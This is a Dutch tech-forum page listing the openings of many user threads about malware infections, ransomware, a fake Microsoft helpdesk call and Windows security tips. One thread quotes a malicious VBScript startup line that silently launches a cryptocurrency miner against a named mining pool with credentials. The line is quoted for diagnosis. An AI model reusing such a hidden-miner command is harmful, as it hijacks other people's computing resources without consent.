Cookies op Tweakers

Tweakers maakt gebruik van cookies, onder andere om de website te analyseren, het gebruiksgemak te vergroten en advertenties te tonen. Door gebruik te maken van deze website, of door op 'Ga verder' te klikken, geef je toestemming voor het gebruik van cookies. Wil je meer informatie over cookies en hoe ze worden gebruikt, bekijk dan ons cookiebeleid.

Meer informatie
Stel een vraag

Discussieer mee of stel een vraag

Filters - Verfijn resultaten

Topictype

CategorieŽn

AND

Onderwerpen

AND

Subforum

Datumbereik

Topicstarter

Topicstatus

108 topics - Pagina 1 van 5

[Virusscanners] Discussietopic deel 4

15:30 discussie 2.134

Virusscanners discussietopic deel 4

Introductie
Het discussie onderwerp over virusscanners is sinds tijden een van de populairdere posts in dit forum. Omdat het vorige deel uit de serie inmiddels de 1400 posts alweer ruim is gepasseerd vonden wij het tijd voor een nieuw fris deel in de reeks.

De vorige delen zijn hier te vinden:
[Virusscanners] discussietopic
[Virusscanners] discussietopic deel 2
[Virusscanners] Discussietopic deel 3


Virusscanners op de markt
Een overzicht van een groot aantal virusscanners op de markt.
Online virusscanners - volledige virusscan
Onderstaand een overzicht van online virusscanners waarmee je een volledige scan van een systeem kunt uitvoeren. De meeste van dit soort scanners zijn gebaseerd op active-x componenten. Sommige werken alleen met Internet Explorer waar anderen meerdere browsers ondersteunen.
Online virusscanners - single file scan
* = Deze virusscanners bieden de mogelijkheid om een enkel bestand te scannen met meerdere anti virus engines om zo te komen tot een betrouwbaardere indicatie of een bestand besmet is of niet.
Online virus statistieken en waarschuwingen
Anti virus removal tools
Omdat sommige anti virus pakketten lastig compleet te verwijderen zijn (bv wanneer je over wilt stappen op een ander product) een lijstje met removal tools van diverse leveranciers. Zorg altijd voor een goede backup van het systeem voor je een van onderstaande tools gebruikt. Gebruik op eigen risico.
Vergelijkende sites
Er zijn diverse sites welke periodiek de effectiviteit van virus- en anti- malware scanners testen. Hieronder vind je een aantal van de bekendere test sites. Let op dat testen niet altijd een heel goede weergave geven van de doeltreffendheid van een virusscanner gezien de test methoden erg uit elkaar lopen en niet altijd even goed de realiteit afspiegelen.
Mis je iets in de topicstart?
Aanvullingen en tips voor de topicstart kun je altijd per direct message aan mij kenbaar maken. Het is de bedoeling om de topicstart een levend document te houden.

usb virus maakt usb apparaten onbruikbaar, hulp gezocht

15-09-2015 discussie 15
goedenavond,

de computer van mijn broertje zit al een tijdje met een agressief virus en na geen adequate oplossingen gevonden te hebben probeer ik het via deze weg.
Het probleem heeft te maken met een virus dat via usb binnen gekomen is en nieuwe aangesloten usb apparaten onbruikbaar maakt. Dit wil zeggen: zijn pc kan de usb apparaten niet zien/lezen, maar na insertie kunnen deze ook niet meer op andere (niet geÔnfecteerde) computers gebruikt worden. Tot zo ver betreft het 2 usb sticks, een externe hdd 3,5'' (na vervangen case werkte deze weer) en nu een xbox controller.

Anti malware bytes en hitman pro heeft helaas niet geholpen en googlen brengt mij niet veel verder.

Is er iemand met meer expertise op dit gebied die mij zou willen helpen?

mvg
Bernhard

ps: sorry voor het niet runnen van hijackthis, pc was niet ter mijn beschikking

Teamviewer

22-06-2015 discussie 5
Hallo iedereen,

Ik ging deze avond iemand helpen omdat ze problemen had met haar computer i.v.m. printen. Ik dacht dat dit enige driverproblemen ofso zouden zijn maar na nader inzicht heb ik kunnen vaststellen dat de computer "vol" virussen en malware zat.

Bij deze wou ik vragen of het mogelijk is of deze kunnen doorgegeven worden aan mijn computer en hoe ik dit het best kan nakijken (antivirus al gedaan).

Alvast bedankt!

malware

12-06-2015 discussie 11
Goedemorgen Tweakers !

na enige tijd zonder virusscanner gedraaid te hebben, weet ik wel zeker dat ik wat malware op mijn pc heb staan. Nu ben ik dus opzoek naar een virusscanner die zoveel mogelijk vind.

iemand dus een tip welke (gratis het liefst) virusscanner ik kan gebruiken ?

alvast bedankt !

Ransomware op twee computers binnen een uur

02-06-2015 discussie 17
Dag allemaal,

Ik heb sinds twee uur hetzelfde ransomware virus op mijn desktop en mijn laptop. Het betreft Locker V4.76.
Nu heb ik geen antivirus op beide machines staan, dus ik ben hier niet om te klagen dat al mijn files zijn ge-encrypt (allhoewel dat wel balen is 8)7 ). Waar het mij vooral om gaat: het gebeurt via twee pc's tegelijk!

Weet iemand wat hier de oorzaak van is kan zijn? De enige manier waarop mijn machines verbonden zijn is dmv dropbox en mijn microsoft account. Hoewel er hier niet over piraterij gepraat word kan ik zeggen dat de ene machine hierin verschilt t.o.v. de andere: er is niet op beide machines van een illigale versie van windows gebruik gemaakt.

Wat mij eigenlijk nog het meeste opviel: op het internet is er bijna niks over te vinden, op een document na:
http://deletemalware.blog...er-virus-and-restore.html

Het rare detail aan dit document? Het is slechts 5 uur oud! Zou dit kunnen betekenen dat dit virus zich een tijd lang stil heeft verplaatst, en nu ineens geactiveerd is? Op beide pc's is het probleem rond 00:00 (25 mei 2015) begonnen.

De belangrijkste reden dat ik dit vraag is het feit dat mijn dropbox folder ook geÔnfecteerd is. Hoewel dropbox (gelukkig maar!) aan een gratis 30-day-retention doet is alles terug te zetten, maar er zitten ook een aantal (permanent) gedeelde mappen in mijn dropbox, welke wij als projectgroep als deeldirectory gebruiken. Moeten zij zich ook zorgen maken dat het virus via deze link zich kan delen? Ik kan me namelijk niet goed bedenken hoe het virus anders van mijn Desktop naar mijn Laptop heeft verplaatst. Maar, daar tegenover staat weer het feit dat dropbox alles logd wat er veranderd word aan de directories, en deze heeft alleen maar wijzigingen gelogd (geen toevoegingen van een van beide pc's)

Wat denken jullie? Alvast bedankt!

svchost.exe probeert verbinding te maken met malware

23-05-2015 discussie 32
Hallo Tweakers,

Om een lang verhaal kort te houden, ik heb last van een proces of service die steeds svchost.exe instructie geeft om een malware dll te downloaden van verschillende sites. Ik krijgt dankzij Avast gelukkig steeds de melding dat deze verbinding wordt geblokkeerd, dus er is nog niks aan de hand. Alleen is er dus iets dat steeds svchost.exe de instructie geeft om iets te downloaden.

Wat er wordt geprobeerd te downloaden is een bestand genaamd "TroubleFix_142669689991445.dll", een snelle search geeft aan dat dit gewoon rommel is. Ook verschillende varianten van deze dll worden geprobeerd te downloaden van verschillende sites (De sites zal ik hier om veiligheidsredenen niet posten).

Mijn vraag is:
Hoe kom ik er achter wat deze dll's probeert te downloaden via svchost? Ik heb al verschillende scans over m'n pc gehaald en alles geeft niks aan (Malwarebytes, Avast, Spybot, tdss killer), wat ook logisch is aangezien Avast het blokkeert, er is nog niks gedownload

Als jullie scan logs of iets anders willen hebben geef een gil!

Hopelijk kunnen jullie mij helpen, dit is de eerste keer sinds lange tijd dat ik zo iets raars heb gezien...
Alvast bedankt! :)

Trojan verwijderd. Nu veilig?

17-05-2015 discussie 10
Ik heb na een tip in een ander topic geprobeerd malware te vinden op mijn computer. Die computer gedroeg zich nl. een beetje raar (karakters met diakrieten zoals Ž deden het niet meer).

En verdomd: ik had een trojan. Hij deed zich voor als Chrome.exe. Trojan.Win32.Generic. Iemand enig idee wat dat is?

Ik heb het gevonden met een gratis versie van Kaspersky. Na wat processen killen kon ik het bewuste bestand (Chrome.exe) verwijderen. Dat had Norton toch maar mooi doorgelaten.

Ik zie nog wel wat gekke dingen op mijn systeem. Meteen na een reboot, zonder Chrome te hebben opgestart, zijn er al tig processen die zichzelf chrome.exe noemen:

http://i1226.photobucket.com/albums/ee414/evert67/1_zpslvajngwy.jpg

En bij het opstarten wordt een bestand met de rare naam GoogleChromeAutolanch_Heelveelcijfersenletters gestart:

http://i1226.photobucket.com/albums/ee414/evert67/Untitled-1_zpspp5nlcgl.jpg

Is dit normaal of ben ik nu paranoÔde (met trema :) ) geworden?

Windows naar de knoppen

17-05-2015 discussie 28
Beste mede tweakers,


Tja, zo help je mensen en zo ben je zelf de klos..


Sinds enkele dagen werkt mijn SSD zeer traag.
Dit is ontstaan na installatie van Pokemon emulator (bevat mogelijk een virus). Ik had gehoord dat er veel populaire Emulators zijn. Dus ik Googelde gewoon: Pokemon emulator en klikte de 1e link aan. Vervolgens gedownload. Via Virustotal het bestand gescand. Er waren 20/55 virusscanners die zeiden dat het adware was. Ik dacht: "adware kan ik vaak gewoon verwijderen via programma's verwijderen/wijzigen of ik verwijder ze met AdwCleaner.." Met de installatie alles op decline geklikt. Daarna ging hij het .gba bestand downloaden via het programmaatje zelf (sowieso heeft hij scriptjes gedownload en automatisch uitgevoert denk ik).
Met verschillende programma's zoals AdwCleaner, HitManPro en Malwarebytes naar virussen gezocht.
De volgende dingen werken niet meer: internet (bekabeld), Windows Firewall kan niet meer ingeschakeld worden.
Malwarebytes ook in veilige modus (Windows) opgestart, dan krijg ik de melding dat ik het niet kan opstarten (ook geblocked dus..). Ook heb ik systeemherstel geprobeerd, en terug proberen te zetten van een aantal dagen voordat ik het virus had. Dit mocht niet baten.. ik kreeg een foutmelding.


Gelukkig heb ik wel een back-up op mijn externe harde schijf staan van mijn media (foto's, video's, muziek, programmeerprojecten en documenten). Nu wil ik er ook graag achter komen en weten of ik mijn Windows nog kan redden (aangezien hij corrupt is).


Ik kan natuurlijk Windows er opnieuw opnieuw op zetten, maar dan ben ik ook de safe data kwijt van al mijn games! (Die ik niet op mijn externe HDD heb staan).


Op mijn SSD heb ik dus mn Windows (256gb), en op mijn HDD (interne 3tb) heb ik mn data en games.†


Als ik zou weten of het een worm is of niet zou ik mijn externe harde schijf nog kunnen aansluiten voor een recentere backup (incl savedata).


Ik zou het erg fijn vinden als iemand mij zou kunnen helpen of advies zou kunnen geven. Ik sta open om antwoorden te geven op jullie eventuele vragen.


Alvast bedankt

Virus op cd-rom

17-05-2015 discussie 27
Goedemiddag,

Ik kon niet echt een goede plek voor dit topic vinden, dus plaats ik het maar hier. Ik heb onlangs via Youtube een giveaway gewonnen waarbij ik GTA V op CD-rom krijg. Nu wil ik wel zeker weten dat er geen troep op staat enzo, dus heb ik een aantal vragen daarover:

- Kan een virus op CD's staan?
- Zo ja, kan je deze eraf halen en hoe?

Ik heb Panda Antivirus 2015 Pro ... mocht dat nodig zijn?

Mvg,

colko111

Ransomware te pakken :/

11-04-2015 discussie 15
Hoi allemaal, ik heb zojuist ransomware bericht gekregen.
Ik zat dus op een site.. en kreeg plots die cybercrime melding op me beeldscherm.
Gelukkig had ik er al ervaring mee en wist dat dit een grote scam is.
Ik heb mijn pc opnieuw opgestart en heb nergens meer last van als ik internet open, de virus lijkt compleet verdwenen.
Maar nu vraag ik me toch af, zit deze virus toch nog op mijn pc? en/of moet ik nog iets verwijderen via Veilige Modus of is die ransomware meteen van me pc weg?
Viruscanner geeft ook geen virus of detection aan.

Alvast bedankt.

BitCoin virus

02-02-2015 discussie 5
Het viel me de laatste dagen op dat er een proces, mscfn.exe, constant de processor volledig belastte. Ik dacht eerst dat het onderdeel was van Windows Update maar het programma bleef maar draaien. Later bleek ook dat het programma niet was ondertekend.

Programma wordt gestart vanuit de map 'opstarten' met een Visual Basic-script:
VBScript:
1
WScript.CreateObject"WScript.Shell" ).Run "mscnf.exe --url http://eu-proxy.ecki.net:7332 --userpass wotan.4:x --quiet -r -1",0,0

Nu is er vrij weinig informatie te vinden hierover. VirusTotal heeft 6 hits. De URL die in het script staat verwijst naar een BitCoin-pool. Het bijbehorend account is al geblokkeerd. Is er een mogelijkheid om erachter te komen hoe dit op het systeem is terecht gekomen en weet iemand misschien of dit echt alleen een bitcoin-virus is?

Virus of Malware? & Windows Defender zomaar uit?

31-08-2014 discussie 10
Goedenavond,

Ik start net mijn pc op en bij open krijg ik dit

http://i57.tinypic.com/3168aa1.png

Geen idee wat het was maar ik heb toen op openen met kladblok gedaan toen kwamen er allemaal cijfers en ip's en dingen in een flits voorbij in kladblok toen sloot het snel af. En opende er een pop up naar een af andere online gok site...

Op dat moment gaan de rillingen weer door me nek want ik weet hoelaat het is.. Dus ik probeer met Windows Defender een scan te doen maar je raad het al.. Defender is uitgeschakeld en laat zich ook niet meer opstarten. Ik kan ook merken aan de pc dat hij langzamer is en internet ook merkbaar verschil in zit. Ik zit nu een beetje met de handen in het haar aangezien ik allang geen virus scanner mee gebruik sinds windows defender.

Verder heb ik ook geen flauw idee hoe ik hier vanaf moet zien te komen. De symptomen nu zijn een tragere PC + Internet en dat Windows Defender niet meer werkt.

Het is helaas niet gelukt de melding een 2e keer op te roepen. Maar het feit dat Windows Defender zomaar opeens is uitgeschakeld zegt genoeg dat er iets gaande is op mijn pc.

Wie kan me een helpen hier vanaf te komen of een zetje in de goederichting geven? Ik heb namelijk geen idee waar te beginnen. :( :(

"Microsoft helpdesk" belt om te zeggen dat je een virus hebt

28-07-2014 discussie 47
Ik had vanochtend een of ander onverwachts telefoontje, iets wat ik graag met jullie wil delen.

In ieder geval, Een Engels sprekend iemand met een Indiaans/Pakistaans accent belde mij op. Hij zou van het officiŽle Microsoft helpdesk team zijn of iets dergelijks, uit Engeland nog wel.
Hij wist mij te vertellen dat ik gevaar liep want er stond een virus op mijn computer :o .
Ik had het echter al meteen in de gaten, want wij hebben gewoon een Nederlandse helpdesk en support afdeling van Microsoft, die ook nog allemaal Nederlands spreken. :*)
bovendien... sinds wanneer belt Microsoft je op... die willen in de meeste gevallen eerst geld zien :/
Grappig is ook dat het telefoon nummer een 06 nummer was. Gek, want 1: in GB hebben ze een 07 nummer voor mobiele telefoons en 2: microsoft belt met mobieltjes??? :|

Ik besloot dus in het verhaal mee te gaan en heel erg bezorgd te zijn, als een gemiddelde computer leek, echter ben ik een Technisch Informatica student, dus ik wist wat ik deed ;)

De man vertelde mij dat ik misschien niet op de hoogte was van het probleem en dat hij kon laten zien op mijn computer dat het goed mis was. Ik moest mijn computer aanzetten en "eventvwr" uitvoeren. Dit is de event viewer in Windows en logt alle informatie over wat er mis is gegaan in je pc enzo.
Vervolgens moet ik bij Windows-logboeken eens zien hoeveel warnings en errors er onder applicaties, beveiliging en systeem stonden.

Met een paniek stem zei ik dat er zo ontzettend veel fouten in stonden. Compleet sarcastisch natuurlijk, want ondertussen had ik mijn computer helemaal niet aan :D

Ik vroeg hem hoe ik het op kon lossen, en ik moest maar eens naar een site gaan en wat downloaden en dan zal alles opgelost zijn.
Ja, dat was voor mij het punt om hem te confronteren 8)

Ik vertelde hem dat ik helemaal geen Windows had, maar Linux Mint draaide. Dat is ook zo, want Windows gebruik ik vrijwel nooit meer. Ook vertelde ik hem dat ik een "Computer Engineer" was, want ja, zo noemen ze mij in het Engels :)

Hij antwoordde met een iets wat geschrokken stem: "You are Computer Engineer yes?"
"Ja zeker" zei ik, "en ik ga nu de politie bellen".

Ik heb werkelijk waar nog nooit zo snel de hoorn op de haak horen gaan _/-\o_


Ik was eerlijk gezegd wel verbaast dat ze je tegenwoordig op deze manier al proberen op te lichten om malware op je pc te installeren! Ik wil dus iedereen waarschuwen voor deze oplichting praktijken.

Ik ben in ieder geval weer een goed verhaal ;)

Veilige of onveilige spiegelserver?

23-04-2014 discussie 16
Ik update gisteren heel stom via root.lu, dat was echt een malicieuse website. Daarna installeerde ik Mint op advies van het IRC-kanaal opnieuw. Echter, later kwam ik er achter dat ik dat had gedownload via http://ftp.nluug.nl/. Is die server wel bonafide? En moet ik hem dan weer opnieuw installeren?

Met vriendelijke groet,
12345dan

Verdachte Situatie, wat denken jullie ?

18-04-2014 discussie 16
Hoi iedereen,

ff een nieuwe post want iisschots heeft mijn vorige topic (zonder uitleg ) gesloten omdat
hij dacht dat ik een file ging posten denk ik ( ga ik NIET doen dus )

Ik zit met een verdachte situatie, wat denken jullie:
na de trial versie van UltraISO te hebben gedowned heb ik een reg key gekocht,
was maar 20§.

Nu gaven ze mij een reg key, die je kan gebruiken om de trial versie te registreren
en de limieten weg te halen.. Maar die key werkte niet.

Dan mailde ze me maar een download link door waar de key wel zou werken..
Alleen bij deze file vindt virustotal en metascan een trojan.. ( bij de trail download v/d site niet )

Ik heb em dan maar gesandboxed geprobeerd.. het werkt wel maar verdacht genoeg moest ik zelfs mijn
reg code niet eens geven opgeven.. vreemd

Nu is het programma nutteloos voor mij in de sandbox, omdat ik dan maar met ISO's kan werken zo groot
als de SSD in mijn laptop.. ik wil nl met ISO's van +1TB werkenk op mijn externe HD's

Wat ook niet helpt is dat de makers chinees zijn en dat er een "clone" programma uit is ( magicISO )
dat al dan niet van dezelfde makers is.. ( ook chinezen )


Wat denken jullie ? verdacht ?

IRC bot virus

18-04-2013 discussie 10
Beste tweakers,

Volgens mijn provider KPN heb ik last van een IRC botnet virus. Ik heb nu alle windows computers gescand met antivirus software, maar niks gevonden.

Met nmap heb ik naar gekke porten gezocht, maar ook niks geks kunnen ontdekken.

Iemand een suggestie over hoe ik hem kan vinden op mijn netwerk?

Bedankt alvast.

Babylon verwijderen?

10-10-2012 discussie 14
Heb per ongeluk (vergeten een vinkje te zetten bij een installatieprogramma volgens mij) de babylon toolbar op mijn pc geÔnstalleerd. Heb het toen via de uninstaller proberen te verwijderen, en daarna meteen CCleaner gedraaid. De toolbar leek volledig verwijdert te zijn.

Maat helaas, als ik Spybot draai ziet hij Babylon als spyware. Zodra ik op 'aangevinkte problemen oplossen' klik lijkt hij weg te zijn... maar wanneer ik Spybot opnieuwd draai ziet hij weer dezelfde problemen. Het lijkt alsof Babylon zich in mijn systeem 'genesteld' heeft.
Weet iemand hoe ik Babylon echt volledig van mijn pc af krijg?

Ik hoor her en der al negatieve dingen hierover, maar nu het ook lijkt alsof ik het onmogelijk van mijn pc verwijdert krijg vertrouw ik het al helemaal niet meer.

nb: Spybot werkt zover ik weet prima. Ik voer hem voor de zekerheid altijd uit als administrator, en overige potentiŽle bedreigingen verwijdert hij zonder problemen. (Alleen die Babylon ziet hij telkens weer)

Plaatje op imageshack (popups!)

http://imageshack.us/a/img411/4165/meldingen.png

Sabam virus (ukash)

25-09-2012 discussie 10
Hallo

Ik heb sinds vandaag het sabam virus (ukash) op men laptop en weet niet hoe ik het er moet afkrijgen. Heb al op internet gezocht maar vind niets.
Ik heb maar 1 user account op de laptop dus kan niet inloggen op een andere account en als ik opstart in veilige modus komt het virus er nog steeds op.
Iemand raad?

alvast bedankt.

Methode om windows veiliger te maken

17-09-2012 discussie 7
Dit is geen vraag dit is meer beveiligingsadvies
Ik ben nieuw bij tweakers en dit leek me een geschikte plaats om dit te posten

Onlangs las ik een artikel waarin een onderzoek van Microsoft stond dat 45% van de malware en virussen die op een pc staat de schuld is van de gebruiker(ik persoonlijk denk dat dit hoge gaat liggen).
Veel malware en virus die zich op een Windows toestel nestelen komt door een slechte beslissing van de gebruiker
{dit gebeurt meestal wanneer er zo een venstertje op komt van Windows met ja of nee keuze}

Bron: http://www.darkreading.co...ns-mostly-your-fault.html

Wel hier wil ik een manier geven die een gebruiker bewuster moet maken van wat er nu juist op zijn of haar pc gebeurd.

Wat ik hier ga uitleggen helpt in principe NIET rechtstreeks tegen virus en of malware.
Maar het maakt je als gebruiker wel bewuster van wat je nu juist doet en dat vind ik persoonlijk even belangrijk als het niet belangrijker is dan een virus scanner.
Meeste tweakers zouden dit normaal gezien al moeten weten. Dit is er voor de mensen die het nog niet moesten weten.
  • Stap 1: maak je hele pc leeg dus HDD’s formateer je en SSD’s verwijder je de partitie (niet formateren vooreen of andere reden doe je dit best niet zoek even op hoe je juist handeld bij een SSD) Dit doe je om van een schone pc te beginnen normaal heb je back ups van je PC als je dat niet hebt zorg dat je alles ergens extern opslaat voor je hier aan begint
  • Stap 2: installeer je Windows distributie(XP, Vista, 7, of de toekomstige 8)
  • Stap 3: gebruik de administrator account voor alle drivers / software / Games te instaleren
  • Stap 4: geef een lang wachtwoord aan je administrator account (ik raad 15 karakters of op zijn minst 10 karakters )
  • Stap 5: maak een of meerder gebruikers accounts aan (wachtwoorden zijn een optie)
  • Stap 6: gebruik altijd je gebruikers account, de administrator account gebruik je ENKEL voor software te instaleren/updaten
Nu als je je pc op deze manier gebruikt zal er elke keer als er iets zich wilt installeren gaat dit vragen naar een wachtwoord om meer precies te zijn het administrator wachtwoord

Wat is nu het nut hiervan ?
Wel een van de redenen dat Linux veiliger beschouwd wordt dan Windows.
Is omdat Linux dit standaard doet telkens als je een update of installatie doet op eender welke Linux distributie wordt er achter het root(admin)wachtwoord gevraagd.

Als je gewoon gebruikt maakt van je Windows administrator account dan wordt er enkel gevraagd om “ja” of “nee” dus geen wachtwoord nu veel mensen klikken gewoon op ja zonder te lezen of te beseffen wat ze nu juist toegelaten hebben.
(de wet van de luiste zorgt hier meestal voor)


Bovenstaande stappen volgen heeft eigenlijk geen enkele meer functie als virus preventie zo als ik eerder had vermeld.
Het enigste wat dit doet is ervoor zorgen dat de gebruiker(dus jij) meer besef krijgt dat er iets gaat gebeuren wat al een hogere toestemming nodig heeft.
Zoals wanneer je gewoon aan het surfen bent en er wordt gevraagd achter je administrators wachtwoord. Dan zou er al een belletje moeten rinkelen dat er iets mis is of wanneer je iets bezig bent wat eigenlijk geen installatie nodig heeft.
Waarom 15 karakters wel omdat het enorm vervelend is omdat telkens te type.
Zie het als extra motivatie om te lezen of het de moeite is om je wachtwoord te type
(de wet van de luiste is meestal van toepassing wanneer we op de PC zitten)


Als je kinderen hebt die ook gebruik maken van je PC heeft dit nog meer nut zoals privacy
(als admin kan je ook bepaalde programma’s blokkeren voor gewone gebruikers, je kan nog meer dan enkel dat)
Kinderen hebben nog meer de neiging om gewoon ja te klikken en van alles te instaleren op je pc.Wat eigenlijk gevaarlijk kan zijn. Zij hebben meestal geen besef dat ja klikken fout kan zijn. (deze horen vanzelf sprekend het admin wachtwoord niet te weten!)

Nu normaal gezien geeft een GOEDE antivirus scanner al een waarschuwing van een gevaarlijk bestand.
Maar zelfs de beste antivirus scanners kunnen wel eens iets door laten.


Zover mijn tip om je bewuster met je pc te laten werken.

Hopelijk is dit nuttig geweest, mijn excuus voor eventuele type fouten als je ze ziet je kan altijd even een PM sturen en ik zal ze aanpassen dyslectici is nog al onhandig wanneer je iets wilt uitleggen.

Met Vriendelijke Groeten ,
R3belz

Virus Buma Stemra

16-09-2012 discussie 36
Vandaag 05-06-2012 had ik een virus ontvangen die ik nog niet eerder op deze manier heb onvangen.
De virus hield in Buma Stemra/Politie en vertelde mij dat ik via piraterij ervoor gezorgt had dat mijn computer/ip-adres geblokkeerd was.
Ik zou een boeten moeten betalen van 100euro of een gevangenisstraf moeten uitzitten van 3dagen omdat ik hieraan deelnam.
Dit leek mij heel raar ik download vergeleken met heel nederland niks/bijna niks en had/heb nergens op geklikt wat hoe dan ook een pop-up of virus had kunnen openen hieronder heb ik foto's staan van de pop-up.

Toen ik dit eenmaal op mijn pc had staan kon ik dit niet verwijderen/omzeilen via taakbeheer of iets in die richting dus dacht ik aan opnieuw opstarten, dit zorgde ervoor dat ik weer hierop uitkwam en tijdens opstarten zonder internet verbinding ook.
Uiteindelijk heb ik heb kunnen opstarten via de hele tijd F8 en F10 omstebeurt snel in te drukken (persoonlijk weet ik niet welke de opdracht promp aanzet), waarna ik dus bij mijn instellingen kon komen, en heb de optie terugzetten naar eerdere tijd gekozen en terug gezet naar een dag eerder.
Dit heeft mijn pc uitgevoerd en dus ik zoals ik heb ervaren de virus weggehaald.
Daarna heb ik dus een aantal scans over mijn pc gehaald en niets meer terug gezien van enig virus/dreigemend op mijn pc.!

Dus wie iets krijgt van Buma Stemra of Politie, onthoud u krijgt altijd eerst een waarschuwing mocht er iets gebeuren en anders probeer deze stappen!!

Succes,
M4rty

[iOS 5.0.1] Virus verwijderen

08-09-2012 discussie 22
Ik denk dat ik via Whatsapp een virus heb opgelopen.

Ik kreeg van een onbekend persoon een bericht met een spoofed afzender. Ik kreeg het bericht al enkele maanden, maar ik ben enkele dagen geleden zo stom geweest om toch op die link te klikken. Stom, want de afzender is "Server." Klinkt ook lekker betrouwbaar. De link die geopend werd was ook een heel andere link dan de link die je kon zien :X

Whatsapp wil nu niet meer verbinden. Hij staat op Connecting, dan een seconde op Connected, en dan schiet hij weer op Connecting. Ik ontvang wel berichten op mijn omlaagbeweegding, maar zodra Whatsapp opent dan ontvang ik de berichten niet meer. Op de Twitterpagina van Whatsapp wordt wel gesproken over storingen, maar mijn storing begon al veel eerder en komt niet overeen met de storingen die daar vermeld staan.

Een factory reset en een backup terugzetten heeft geen zin, want het virus is allang meegegaan in de backup (geen iTunes backup maar iCloud backup, kan dus alleen de laatste backup terugzetten). Ik heb de telefoon al opnieuw opgestart met de Newsstand knop en ik heb de telefoon al opnieuw gestart met de power knop. Ook heb ik Whatsapp afgesloten met de dubbelklikknop. Het probleem blijft echter bestaan, terwijl andere applicaties wel gewoon kunnen verbinden. Om erger te voorkomen heb ik de mobiel bankieren app verwijderd.

Wat kan ik nu het beste doen? Ik wil graag mijn SMS berichten bewaren, maar het virus zit ongetwijfeld allang in mijn backups, dus een backup terugzetten gaat ook niet.

Wellicht noemenswaardig om te vermelden is dat ik de tralies van mijn iPhone heb verwijderd, maar alleen om het "alpine" wachtwoord te veranderen in een sterk wachtwoord. Verder doe ik niets met Cydia.

Proyekto1 runtime error 53

19-08-2012 discussie 13
Hallo allemaal,

ik krijg ineens bij opstarten een schermpje (zie image) waardoor ik denk dat ik een virus heb. Waarom denk ik dat ? Omdat ik namelijk pasgeleden een soort trojan had w32 nogwat ... Maar ik dacht dat alles toch echt verwijderd was.

Wat heb ik gedaan om die trojan te verwijderen ?

- addaware volledig geupdate en gedraaid, zowel in normal mode als safemode. Deze heeft meerdere bestanden gevonden en verwijdert.

- gratis Emsisoftware trojan/addware remover gedraaid, deze heeft niks meer gevonden

- stinger van Mcfee deep scan laten doen in safemode > niks gevonden

- computer met virus scanner gedraaid, ook niks meer gevonden


Ik dacht dat ik dus weer virus/trojan vrij was .. Nu krijg ik in 1x dit scherm ?? Gegoogle en wel iets gevonden over dat proyekto1. Daar stond een removal tool bij, maar die heeft niks gevonden (zou proyekto1, 2, 3 en 4.exe kunnen zijn). Ik zie deze ook niet in processen staan.

Zou iemand mij verder kunnen helpen ? Ik ga zelf ook zeker verder zoeken, maar misschien dat iemand tip(s) heeft.

Thanks. !

Dit is het schermpje wat ik krijg:

http://oi50.tinypic.com/szv5ti.jpg

Virus, DoS Attack.

14-08-2012 discussie 1
Gisteren avond is een vriend op bezoek geweest met zijn laptop, omdat hij natuurlijk ook graag wat wou gamen hebben we deze laptop voorzien van internet.
Na +- 15 minuten werd het internet merkbaar sloom aangezien ik vaker problemen heb gehad met het internet zocht ik hier niks achter, vanmorgen begon het me echter te irriteren dus even een powercycle uigevoerd. Deze powercycle v/h modem + de router hielp niks. Toen ik inlogde in de router gingen alle alarm bellen rinkelen toen ik de logs bekeek;
[LAN access from remote] from 36.238.195.183:26480 to 192.168.1.11:60681 Tuesday, Aug 14,2012 12:01:50
[LAN access from remote] from 178.44.145.215:6881 to 192.168.1.11:60681 Tuesday, Aug 14,2012 12:01:42
[LAN access from remote] from 1.22.244.82:21893 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:58:04
[LAN access from remote] from 46.232.228.172:40206 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:57:04
[LAN access from remote] from 200.207.173.244:19493 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:56:55
[LAN access from remote] from 178.126.65.241:29554 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:56:52
[LAN access from remote] from 94.113.233.17:37302 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:56:18
[LAN access from remote] from 178.92.155.132:28620 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:56:12
[LAN access from remote] from 89.139.170.130:10183 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:55:56
[LAN access from remote] from 69.132.113.169:29814 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:55:08
[LAN access from remote] from 98.193.91.37:35774 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:55:01
[LAN access from remote] from 151.50.79.123:28477 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:54:22
[LAN access from remote] from 176.42.91.99:40476 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:54:16
[LAN access from remote] from 80.237.113.6:12545 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:54:11
[LAN access from remote] from 88.18.59.9:20583 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:54:07
[LAN access from remote] from 89.186.114.131:16314 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:53:53
[LAN access from remote] from 95.29.85.215:35691 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:53:53
[LAN access from remote] from 80.98.186.124:64560 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:53:26
[LAN access from remote] from 74.236.111.54:47424 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:53:24
[LAN access from remote] from 95.189.0.84:44850 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:53:12
[LAN access from remote] from 195.211.212.94:5340 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:52:56
[LAN access from remote] from 89.233.200.54:60398 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:52:43
[LAN access from remote] from 2.125.93.227:42408 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:52:41
[LAN access from remote] from 122.146.53.193:22746 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:52:35
[LAN access from remote] from 92.84.169.98:51186 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:52:35
[LAN access from remote] from 175.194.9.22:53748 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:52:27
[LAN access from remote] from 217.76.116.160:51054 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:52:22
[LAN access from remote] from 121.165.222.203:43611 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:52:10
[LAN access from remote] from 99.146.127.96:20632 to 192.168.1.11:60681 Tuesday, Aug 14,2012 11:52:06
